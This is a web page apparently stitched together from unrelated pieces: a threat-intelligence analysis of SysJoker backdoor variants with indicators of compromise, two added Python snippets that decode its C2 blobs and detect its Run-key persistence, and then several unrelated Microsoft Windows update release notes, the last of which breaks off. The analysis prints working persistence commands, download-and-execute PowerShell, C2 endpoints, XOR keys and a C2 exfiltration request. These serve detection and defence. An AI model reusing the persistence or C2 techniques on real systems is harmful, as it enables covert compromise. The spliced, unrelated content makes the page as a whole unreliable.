    Rust SysJoker Variant
    The SysJoker variant (9416d7dc2ecdeda92ba35cd5e54eb044), written in Rust, was submitted to VirusTotal with the name php-cgi.exe on October 12, 2023. Compiled a few months earlier on August 7, it contains the following PDB path: C:\Code\Rust\RustDown-Belal\target\release\deps\RustDown.pdb.
    The malware employs random sleep intervals at various stages of its execution, which may serve as possible anti-sandbox or anti-analysis measures.
    The sample has two modes of operation which are determined by its presence in a particular path. This is intended to differentiate the first execution from any subsequent ones based on persistence.
First, it checks whether the current running module matches the path C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe. Based on the outcome, the malware proceeds to one of the two possible stages.
    First execution
    If the sample runs from a different location, indicating it’s the first time the sample is executed, the malware copies itself to the path C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe and then runs itself from the newly created path using PowerShell with the following parameter:
-Command C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe
Finally, it creates a persistence mechanism and then exits the program.
Persistence is established in an unusual way, using PowerShell with the following argument:
-Command "$reg=[WMIClass]'ROOT\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('&H80000001','Software\Microsoft\Windows\CurrentVersion\Run', 'php-cgi', 'C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe');"
Eventually, this PowerShell code creates a registry Run key in the HKEY_CURRENT_USER hive, which points to the copy of the executable, using the WMI StdRegProv class instead of directly accessing the registry via the Windows API or reg.exe.
    Subsequent executions (from persistence)
    SysJoker contacts a URL on OneDrive to retrieve the C2 server address. The URL is hardcoded and encrypted inside the binary:
https://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112&authkey=!AED7TeCJaC7JNVQ
The response should contain a XOR-encrypted blob of data that is encoded in base64. During our investigation, the following response was received:
KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr
After decryption, the C2 IP address and port are revealed:
{"url":"http://85.31.231[.]49:443"}
Using OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different reputation-based services. This behavior remains consistent across different versions of SysJoker.
    The malware collects information about the infected system, including the Windows version, username, MAC address, and various other data. This information is then sent to the /api/attach API endpoint on the C2 server, and in response it receives a unique token that serves as an identifier when the malware communicates with the C2:
Figure 1 – Bot registration API call.
After registration with the C2 server, the sample runs the main C2 loop. It sends a POST request containing the unique token to the /api/req endpoint, and the C2 responds with JSON data:
Figure 2 – Command request and response.
The expected response from the server is a JSON that contains a field named data that contains an array of actions for the sample to execute. Each array element consists of id and request fields. The request field is another JSON with fields called url and name. An example of the response from the server:
{"data":[{"id":"1", "request":"{"url": "http://85.31.231[.]49/archive_path", "name":"mal_1.exe"}"}, {"id":"2", "request":"{"url": "http://85.31.231[.]49/archive_path", "name":"mal_2.exe"}"}]}
The malware downloads a zip archive from the URL specified in the url field. The archive contains an executable that, after unzipping, is saved under the name field into the C:\ProgramData\php-Win32-libs folder. The archive is unzipped using the following PowerShell command:
powershell -Command Expand-Archive -Path C:\ProgramData\php-Win32-libs\XMfmF.zip -DestinationPath C:\ProgramData\php-Win32-libs ; start C:\ProgramData\php-Win32-libs\exe_name.exe
It is important to mention that in previous SysJoker operations, the malware was able not only to download and execute remote files from an archive but also to execute commands dictated by the operators. This functionality is missing in the Rust version. After receiving and executing the file download command, depending on whether the operation was successful or not, the malware contacts the C2 server again and sends a success or exception message to the path /api/req/res. The server sends back a JSON confirmation indicating that it has received the information: {"status":"success"}.
    Encryption
    The malware has two methods for string decryption. The first method is simple and appears across multiple SysJoker variants. The sample contains several base64-encoded encrypted data blobs and a base64-encoded key. Upon decryption, both blobs are base64-decoded and then XORed to produce the plain text strings.
    The second encryption method is tedious and is spliced in-line throughout the program repeatedly at compile time. This generates a complex string decryption algorithm throughout the sample.
Figure 3 – Example of the decryption of the string “php-”.
Windows SysJoker Variants
    In addition to the newly found Rust variant, we uncovered two more SysJoker samples that were not publicly exposed in the past. Both of these samples are slightly more complex than the Rust version or any of the previously analyzed samples, possibly due to the public discovery and analysis of the malware. One of these samples, in contrast to other versions, has a multi-stage execution flow, consisting of a downloader, an installer, and a separate payload DLL.
    DMADevice variant
    The DMADevice sample (d51e617fe1c1962801ad5332163717bb) was compiled in May 2022, a few months after SysJoker was first uncovered.
    Like other versions, the malware starts by retrieving the C2 server address by contacting the URL: 
https://onedrive.live[.]com/download?cid=F6A7DCE38A4B8570&resid=F6A7DCE38A4B8570!115&authkey=AKcf8zLcDneJZHw
The OneDrive link responds with an encrypted base64-encoded string, which is decrypted with the XOR key QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT. This is the same key that is used in the Rust version.
The decrypted blob contains a JSON with the C2 domain in the following format:
{"url":"http://sharing-u-file[.]com"}
Next, the malware proceeds to the three-stage execution process.
    1. Setup files and persistence
    The sample generates a unique bot ID, sends it in a POST request to the /api/cc API endpoint, and receives back the JSON describing the desired malware setup on the infected machine.
    The JSON has the following structure:
{"key":"f57d611b-0779-4125-a3e8-4f8ca3116509","pi":"VwUD[REDACTED]","data":"PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hbTFldXlx8QwIRSRppeSdrDA1GRVhZW3lXBRtSHFMTHUBpfXZkVkFBRVtaQyhdBhZJWAoaT0NDXkZTR0NRA1lbSlNJVEABElRaXQ8YE11FSA8RSRpeQAdKF0MfE20ZVhBrI3IXJXJ1ESpmc2JrZX57d2ZibDN2OWRgXQVKDBJcV0VqaWdQCFFYE0VtbSFYQkVSV1liVEBGRA5dOWR\/QQgYP05lEx0UaR9NRmdyI2lia0JxH3MVFQ8aVEpQD00RQV1DQlxNEARBX1BbUBBFRnpCEBt3WA5IEBpyV05bVVtbSkEUEExLDEEYREMfE2J5c2RuJ2dyOGp8WAFfX0RYX1lobWVcQwVcEktxaCVNERNWX0VgUEJKD1pZOGpjRAwPbQ=="}
The key field in the JSON is used to XOR-decrypt the other fields after they are base64-decoded: the pi field contains the victim’s IP address and the data field contains an array with multiple values:
["SystemDrive","ProgramData","DMADevice","DMASolutionInc","DMASolutionInc.exe","DMASolutionInc.dll","powershell.exe","cmd","open","start","\/c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \/V","\/t REG_SZ \/D",".exe","$env:username | Out-File -Encoding 'utf8' '","SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"]
Those values are utilized in the following order:
SystemDrive – Get the system hard drive letter.
ProgramData – Create these two folders under the specified (in this case, ProgramData) folder:
  – DMADevice – The first folder name created.
  – DMASolutionInc – The second folder name created.
DMASolutionInc.exe – The file name used by the currently running executable to self-replicate into the DMADevice folder.
DMASolutionInc.dll – The name of the config file.
The rest of the values are used in a few commands that establish persistence via the registry Run key and retrieve the current user name from $env into a temporary txt file.
The config file, in our case DMASolutionInc.dll, is stored on disk encrypted (using the same key used to decrypt the domain) and base64-encoded. It contains encrypted JSON with the following fields:
{"id":"[BOT-ID]","us":"[USERNAME]","ip":"[IP]"}
After performing all these operations, the sample executes its copy from DMASolutionInc.exe and exits.
    2. Register with the C2 server
When the sample is executed again (via persistence from the previous stage), it checks the location it is running from. It then continues the execution by making a POST request to /api/add containing the uuid, user name, and user token, which is also generated by the malware:
uuid=bot-id&nu=username&user_token=token
The server responds with a token generated on its side which is then used for all the subsequent C2 requests.
    3. C2 main loop
    The token received during the previous stage is used for making POST requests to /api/cr on the C2 server to retrieve the commands to execute.
    Similar to other SysJoker variants, the server responds with a JSON that contains field data which is an array of actions to take. This version can download and execute files or run commands and upload the results to the C2 server. For each command in the array, the sample sends a response reporting if it was successful or not.
    AppMessagingRegistrar variant
    This variant has a compilation timestamp of June 2022 and has a quite different execution flow. The functionality of the malware is divided into two separate components: a downloader (DDN, c2848b4e34b45e095bd8e764ca1a4fdd) and a backdoor (AppMessagingRegistrar, 31c2813c1fb1e42b85014b2fc3fe0666).
    DDN Downloader
The threat actors first deliver a lightweight downloader. It creates the folder C:\ProgramData\NuGet Library\, then downloads a zip file from https://filestorage-short[.]org/drive/AppMessagingRegistrar.zip. It unzips the file, copies it into the AppMessagingRegistrar.exe file and then executes it.
    Splitting the functionality into separate components has proved effective: at the time of the first submission to VirusTotal (VT), the malware was not detected by any of the platform’s engines:
Figure 4 – DDN downloader with 0 detections on its first submission to VT (2023-04-09).
AppMessagingRegistrar
    Upon execution, this payload first checks the registry key SOFTWARE\Intel\UNP\ProgramUpdates\UUID for the UUID of the PC. If the registry key is not available, a UUID is generated using the UuidCreate function and is then saved to the previously mentioned key.
Figure 5 – UUID generation.
The variant then proceeds to decrypt a hardcoded OneDrive URL to retrieve a C2 address. The XOR key in this sample is 22GC18YH0N4RUE0BSJOAVW24624ULHIQGS4Y1BQQUZYTENJN2GBERQBFKF2W78H7.
    After the C2 address is decrypted, a POST request is made to the C2 server API endpoint /api/register which contains the previously generated UUID.
    The server responds with a JSON containing a token and a status message: 
{"status": "success", "token":"[TOKEN]", "status_num":1}
The status indicates if the request was valid or not, and the samples check specifically for the string “success”. The token is used for all the following C2 requests but unlike all the other samples, instead of using the body of requests, it is sent in the Authorization header: Authorization: Bearer [TOKEN]. This change could be to accommodate additional flows in the malware execution (discussed below) in which the malware sends a GET request instead of a POST and requires a mechanism for the server to identify the sender.
    The status_num field is used as a global flag to indicate what actions the bot should take. There are four statuses available:
Status Number   Action              Description
0               Setup               Download MsoftInit.dll and execute the init and step exports.
1               Idle loop           Wait for status_num to change.
3               Payload retrieval   Download and save the MsoftNotify.dll DLL.
4               Payload execution   Execute the MsoftNotify.dll DLL.
Setup phase
If the received status_num is 0, the malware creates the C:\ProgramData\Intel\UNP\ProgramUpdates and C:\ProgramData\Intel\Drivers\MsoftUpdates folders. It then proceeds to:
1. Download a DLL file using the function URLDownloadToFileW from the path /api/library/[TOKEN] and save it to C:\ProgramData\Intel\Drivers\MsoftUpdates\MsoftInit.dll.
2. Load MsoftInit.dll and call the init exported function.
3. Load the same DLL again and call the step exported function.
The exact purpose of those functions is unknown as we were not able to retrieve the DLL. However, due to the names and our analysis of previous versions of the malware, we believe they were part of the persistence and setup process. Finally, the malware sends an empty POST request to the API endpoint /api/update. The expected response from the server is an empty JSON.
    Idle loop
    If the status_num is 1, the malware continues to make requests to the C2 API endpoint /api/status in an infinite loop. To break the loop, the status_num must change.
    Main payload download
    If the status_num is 3, the malware proceeds to download a DLL file from URL /api/library/[TOKEN] and saves it to the path C:\ProgramData\Intel\Drivers\MsoftUpdates\MsoftNotify.dll. It then sends a request to the C2 API endpoint /api/ready: if the server responds with a status success, the status flag is then set to 4.
    Payload execution
    If the status is 4, the malware proceeds to make a GET request to the C2 API endpoint /api/requests. The C2 server responds with a JSON with 3 parameters, id, r, and k.
    The malware then loads the MsoftNotify.dll DLL and resolves the function st. The r and k values sent from the server are used by st as parameters. We were not able to retrieve the DLL, but based on the previous versions, this is likely a version of the main command running functionality for the backdoor, and its return value should be a string. After the function runs and returns a result, the id received in the token is used in the POST request to the C2 which contains the output:
POST /api/requests/[ID] HTTP/1.1
Host: 62.108.40[.]129
Accept: application/json
Authorization: Bearer [TOKEN]
Content-Length: 15
Content-Type: application/x-www-form-urlencoded

response=[EXECUTION OUTPUT]
(The C2 host as recorded on VirusTotal: https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e256821711e0b1)
Infrastructure
    The infrastructure used in this campaign is configured dynamically. First, the malware contacts a OneDrive address, and from there, it decrypts the JSON containing the C2 address with which to communicate. The C2 address is encrypted with a hardcoded XOR key and base64-encoded.
    This threat actor commonly uses cloud storage services. Previous reports show Google Drive was used for the same purpose.
Figure 6 – Metadata of OneDrive file containing the encrypted C2 server.
Ties to Operation Electric Powder
    The SysJoker backdoor uses its own custom encryption for three main strings: the OneDrive URL containing the final C2 address, the C2 address received from the request to OneDrive, and a PowerShell command used for persistence:
$reg=[WMIClass]'ROOT\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('&H80000001','Software\Microsoft\Windows\CurrentVersion\Run'[TRUNCATED]
This PowerShell command based on the StdRegProv WMI class is quite distinctive. It is shared between multiple variants of SysJoker and only appears to be shared with one other campaign, associated with Operation Electric Powder previously reported by ClearSky.
    The 2017 report describes the persistent activity carried out in 2016-2017 against the Israel Electric Company (IEC). This operation used phishing and fake Facebook pages to deliver both Windows and Android malware. Windows malware used in this campaign consisted of a dropper, a main backdoor, and a Python-based keylogging and screen-grabbing module.
    Throughout our analysis of the SysJoker operation, we saw indications suggesting that the same actor is responsible for both attacks, despite the large time gap between the operations. Both campaigns used API-themed URLs and implemented script commands in a similar fashion. This includes the Run registry value but is not the only common factor. For example, the following image shows the similarities between the commands used by different malware when gathering recon data from the infected device to temporary text files:
Figure 7 – Use of the type command in Electric Powder → the original SysJoker → DMADevice SysJoker variant.
Conclusion
    Although the SysJoker malware, which was first seen in 2021 and publicly described in 2022, wasn’t attributed to any known actor, we found evidence that this tool and its newer variants have been used as part of the Israeli-Hamas conflict. We were also able to make a connection between SysJoker and the 2016-2017 Electric Powder Operation against Israel Electric Company.
    In our report, we described the evolution of the malware and the changes in the complexity of its execution flow, as well as its latest shift to the Rust language and the latest infrastructure it uses.
    The earlier versions of the malware were coded in C++. Since there is no straightforward method to port that code to Rust, it suggests that the malware underwent a complete rewrite and may potentially serve as a foundation for future changes and improvements.
    Check Point Customers Remain Protected
    Check Point Customers remain protected against attacks detailed in this report, while using Check Point Anti-Bot, Harmony Endpoint and Threat Emulation.
Threat Emulation: Backdoor.Wins.Sysjoker.ta.R, Backdoor.Wins.Sysjoker.ta.Q, Backdoor.Wins.Sysjoker.ta.P, Backdoor.Wins.Sysjoker.ta.O, Backdoor.Wins.Sysjoker.ta.N, Backdoor.Wins.Sysjoker.ta.M, Backdoor.Wins.Sysjoker.ta.L
Harmony Endpoint: Backdoor.Win.SysJoker.H
Check Point Anti-Bot: Backdoor.WIN32.SysJoker.A, Backdoor.WIN32.SysJoker.B, Backdoor.WIN32.SysJoker.C
IOCs
Infrastructure: 85.31.231[.]49, sharing-u-file[.]com, filestorage-short[.]org, audiosound-visual[.]com, 62.108.40[.]129
    Hashes d4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e72 6c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95 e076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e9239836 96dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f 67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc706 0ff6ff167c71b86c511c36cba8f75d1d5209710907a807667f97ce323df9c4ba  
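The OneDrive stage-one blob of the Rust variant and the DMADevice setup JSON described in the report use one scheme: base64 wrapping a XOR against a key (the hardcoded key the report quotes, or the message's own key field). As an added example that is not part of Check Point's report or tooling, this Python decoder recovers the C2 URL from the OneDrive response quoted above using the quoted key, and applies the same routine to a key/pi/data setup message; the setup message here is constructed for illustration, not the one from the report.

```python
import base64
import json
import re

# XOR key quoted in the report for the DMADevice sample; the report states the
# Rust sample uses the same key (the AppMessagingRegistrar sample uses another).
SYSJOKER_XOR_KEY = b"QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT"

# OneDrive response observed for the Rust sample, as quoted in the report.
RUST_SAMPLE_RESPONSE = "KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr"


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key (blobs seen so far are shorter than the
    key, but wrap-around is handled anyway)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_blob(b64_blob: str, key: bytes) -> str:
    """base64-decode a SysJoker blob, XOR it with key and return the plaintext.
    A wrong key normally surfaces here as a UnicodeDecodeError or later as a JSON error."""
    raw = base64.b64decode(b64_blob.strip(), validate=True)
    return xor_with_key(raw, key).decode("utf-8")


def extract_c2_url(b64_blob: str, key: bytes = SYSJOKER_XOR_KEY) -> str:
    """Decrypt the OneDrive stage-one response and return its 'url' field."""
    doc = json.loads(decrypt_blob(b64_blob, key))
    url = doc.get("url")
    if not isinstance(url, str) or not url.startswith("http"):
        raise ValueError(f"unexpected stage-one document: {doc!r}")
    return url


def defang(url: str) -> str:
    """Render a URL safe to paste into a report: dots in the host become [.]."""
    m = re.match(r"^(https?://)([^/:]+)(.*)$", url)
    if not m:
        return url.replace(".", "[.]")
    scheme, host, rest = m.groups()
    return scheme + host.replace(".", "[.]") + rest


def encode_blob(plaintext: str, key: bytes) -> str:
    """Inverse of decrypt_blob (XOR is symmetric); used here only to build test data."""
    return base64.b64encode(xor_with_key(plaintext.encode("utf-8"), key)).decode("ascii")


def decrypt_setup_message(message: dict) -> dict:
    """Decrypt a DMADevice /api/cc setup reply: every field except 'key' is
    base64(XOR(plaintext, key)) and 'data' carries a JSON array of strings."""
    key = message["key"].encode("utf-8")
    out = {}
    for name, value in message.items():
        if name == "key":
            continue
        plain = decrypt_blob(value, key)
        out[name] = json.loads(plain) if name == "data" else plain
    return out


# Constructed setup message (hypothetical key and values, same layout as the report's).
CONSTRUCTED_KEY = "constructed-key-0001"
CONSTRUCTED_SETUP = {
    "key": CONSTRUCTED_KEY,
    "pi": encode_blob("10.0.0.5", CONSTRUCTED_KEY.encode()),
    "data": encode_blob('["SystemDrive","ProgramData","DMADevice"]', CONSTRUCTED_KEY.encode()),
}

if __name__ == "__main__":
    print("stage-one C2:", defang(extract_c2_url(RUST_SAMPLE_RESPONSE)))
    print("setup message:", decrypt_setup_message(CONSTRUCTED_SETUP))
```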
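The StdRegProv persistence command and the reg.exe ADD fragments the report describes are what a defender would hunt for in process-creation telemetry. This added detection example (not from the report) matches both patterns in command lines and extracts the hive, value name and target path; the events are constructed, with the PowerShell argument taken from the article and the reg.exe command assembled from the DMADevice fragments.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Registry path both SysJoker persistence techniques write to (regex-escaped).
RUN_KEY_RE = r"Software\\Microsoft\\Windows\\CurrentVersion\\Run"

# Technique A: Run value written through the StdRegProv WMI class from PowerShell.
# The hive is passed as a VB-style constant: &H80000001 = HKEY_CURRENT_USER,
# &H80000002 = HKEY_LOCAL_MACHINE.
WMI_RUN_RE = re.compile(
    r"\[WMIClass\]\s*'ROOT\\DEFAULT:StdRegProv'.*?\.SetStringValue\(\s*"
    r"'(?P<hive>&H[0-9A-Fa-f]+)'\s*,\s*'" + RUN_KEY_RE + r"'\s*,\s*"
    r"'(?P<value>[^']+)'\s*,\s*'(?P<target>[^']+)'",
    re.IGNORECASE | re.DOTALL,
)
HIVE_NAMES = {"&H80000001": "HKCU", "&H80000002": "HKLM"}

# Technique B: reg.exe ADD into the Run key, assembled by the DMADevice variant
# from the fragments "/c REG ADD HKCU\...\Run /V" and "/t REG_SZ /D".
REG_ADD_RE = re.compile(
    r"\bREG\s+ADD\s+(?P<hive>HKCU|HKLM)\\" + RUN_KEY_RE +
    r"\s+/V\s+(?P<value>\S+)\s+/t\s+REG_SZ\s+/D\s+(?P<target>\S+)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    technique: str
    hive: str
    value_name: str
    target: str
    cmdline: str


def inspect_cmdline(cmdline: str) -> Optional[Finding]:
    """Return a Finding if cmdline matches either Run-key persistence pattern."""
    m = WMI_RUN_RE.search(cmdline)
    if m:
        return Finding("wmi_stdregprov_run_key",
                       HIVE_NAMES.get(m["hive"].upper(), m["hive"]),
                       m["value"], m["target"], cmdline)
    m = REG_ADD_RE.search(cmdline)
    if m:
        return Finding("reg_add_run_key", m["hive"].upper(),
                       m["value"], m["target"], cmdline)
    return None


def scan_events(events: Iterable[dict]) -> List[Finding]:
    """Run inspect_cmdline over process-creation events (dicts with a 'cmdline' key)."""
    return [f for f in (inspect_cmdline(e.get("cmdline", "")) for e in events) if f]


# Constructed process-creation events, not real telemetry: event 1 carries the
# PowerShell argument quoted in the report, event 2 the reg.exe command the
# DMADevice fragments assemble into, events 3 and 4 are benign look-alikes.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe -Command "$reg=[WMIClass]'ROOT\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('&H80000001','Software\Microsoft\Windows\CurrentVersion\Run', 'php-cgi', 'C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe');"'''},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V DMASolutionInc /t REG_SZ /D C:\ProgramData\DMADevice\DMASolutionInc.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -Command "Get-WmiObject -Class Win32_OperatingSystem"'},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Run"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.technique}: {f.hive}\\...\\Run\\{f.value_name} -> {f.target}")
```

Pairing a hit with the image path (powershell.exe or cmd.exe writing a Run value that points into ProgramData) is what separates these from administrative scripts that touch the same key.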

    SeedTheNet
    November 14, 2023—KB5032196 (OS Build 17763.5122)
Applies to: Windows 10 Enterprise LTSC 2019, Windows 10 IoT Enterprise LTSC 2019, Windows 10 IoT Core 2019 LTSC, Windows Server 2019
Release Date:
    11/14/2023
    Version:
    OS Build 17763.5122
    11/17/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page. 
    Highlights 
    This update supports the currency change in Croatia from the Kuna to the Euro.
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes improvements. When you install this KB: 
    This update supports daylight saving time (DST) changes in Syria. To learn more, see Interim guidance for Syria DST changes 2022.
This update addresses an issue that affects user mode printer drivers: they unload unexpectedly when you print from multiple print queues to the same printer driver.
    This update addresses an issue that affects Xenon or Argon containers. They do not start.
    This update addresses an issue that affects NCryptGetProperty(). Calling it with NCRYPT_KEY_TYPE_PROPERTY returns 0x1 instead of 0x20. This occurs when the key is a machine key.
    This update includes quarterly changes to the Windows Kernel Vulnerable Driver Blocklist file, DriverSiPolicy.p7b. It adds to the list of drivers that are at risk for Bring Your Own Vulnerable Driver (BYOVD) attacks.
    This update addresses an issue that affects Windows LAPS. Its PasswordExpirationProtectionEnabled policy fails to turn on the setting.
    This update addresses an issue that affects an Application Virtualization (App-V) environment. Copy operations within it stop working. This occurs after you install the April 2023 update.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the November 2023 Security Updates.
    Windows 10 servicing stack update - 17763.5084
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. 
    Known issues in this update
    Symptom: Using the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node in mobile device management (MDM) apps might incorrectly show a 65000 error in the "Require Device Encryption" setting for some devices in your environment. Affected environments are those with the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies set to enabled and selecting either "full encryption" or "used space only". Microsoft Intune is affected by this issue but third-party MDMs might also be affected.
    Important: This issue is a reporting issue only and does not affect drive encryption or the reporting of other issues on the device, including other BitLocker issues.
    Workaround: To mitigate this issue in Microsoft Intune, you can set the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies to not configured.
    We are working on a resolution and will provide an update in an upcoming release.
    How to get this update
    Before installing this update
    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    Prerequisite:
    You must install the August 10, 2021 SSU (KB5005112) before installing the LCU. 
     
    Install this update
    Release Channel | Available | Next Step
    Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business | Yes | None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10; Classification: Security Updates
    If you want to remove the LCU
    To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5032196.
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.5084. 

    SeedTheNet
    November 14, 2023—KB5032197 (OS Build 14393.6452)
    Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date:
    11/14/2023
    Version:
    OS Build 14393.6452
    11/19/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of  Windows 10, version 1607, see its update history page.  
    Highlights
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes quality improvements. When you install this KB: 
    This update supports daylight saving time (DST) changes in Syria. To learn more, see Interim guidance for Syria DST changes 2022.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.  
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the November 2023 Security Updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
    Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    If you are using Windows Update, the latest SSU (KB5032391) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog. 
    Install this update
    Release Channel | Available | Next Step
    Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business | Yes | None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10; Classification: Security Updates
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5032197.
     

    SeedTheNet
    November 14, 2023—KB5032198 (OS Build 20348.2113)
    Windows Server 2022 Release Date:
    14/11/2023
    Version:
    OS Build 20348.2113
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows Server 2022, see its update history page.     
    Note Follow @WindowsUpdate to find out when new content is published to the Windows release health dashboard.     
    Improvements
    This security update includes quality improvements. When you install this KB:
    This update supports daylight saving time (DST) changes in Syria. To learn more, see Interim guidance for Syria DST changes 2022.
    This update addresses an issue that affects UI Automation and caching mode.
    This update affects Windows Autopilot profiles. The process to download the Windows Autopilot policy is more resilient. This helps when a network connection might not be fully initialized. This update increases the retry attempts when you try to download the Windows Autopilot profile.  
    This update addresses an issue that causes your device to restart when you do not expect it. This occurs after you restore a system.
    This update affects user mode printer drivers. They unload unexpectedly. This occurs when you print from multiple print queues to the same printer driver.
    This update addresses an issue that affects Xenon or Argon containers. They do not start.
    This update affects Windows Server: Azure Edition. It is easier to view attestation failure notifications.
    This update addresses an issue that affects an Application Virtualization (App-V) environment. Copy operations within it stop working. This occurs after you install the April 2023 update.
    This update addresses an issue that blocks external connections. This occurs when you set up a Kubernetes load balanced service and turn on session affinity.
    This update addresses an issue that affects NCryptGetProperty(). Calling it with NCRYPT_KEY_TYPE_PROPERTY returns 0x1 instead of 0x20. This occurs when the key is a machine key.
    This update includes quarterly changes to the Windows Kernel Vulnerable Driver Blocklist file, DriverSiPolicy.p7b. It adds to the list of drivers that are at risk for Bring Your Own Vulnerable Driver (BYOVD) attacks.
    This update addresses an issue that affects Windows LAPS. Its PasswordExpirationProtectionEnabled policy fails to turn on the setting.
    This update addresses an issue that affects the refsutil.exe inbox utility. Options, like salvage and leak, do not work well on Resilient File System (ReFS) volumes.
    This update addresses an issue that might affect a large reparse point. You might get a stop error when you use NTFS to access it. This issue occurs after a canceled FSCTL Set operation changes the reparse tag.
    This update addresses an issue that affects a machine that is used as a remote desktop session (RDS) host. An RDR_FILE_SYSTEM (0x27) stop error occurs. Because of this, everyone that uses RDS starts up from this machine.
    This update addresses a known issue that affects virtual machines (VMs) that run on VMware ESXi hosts. Windows Server 2022 might fail to start up. The affected VMs will receive an error with a blue screen and a stop code: PNP DETECTED FATAL ERROR.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the Security Update Guide and the November 2023 Security Updates.
    Windows Server 2022 servicing stack update - 20348.2084
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
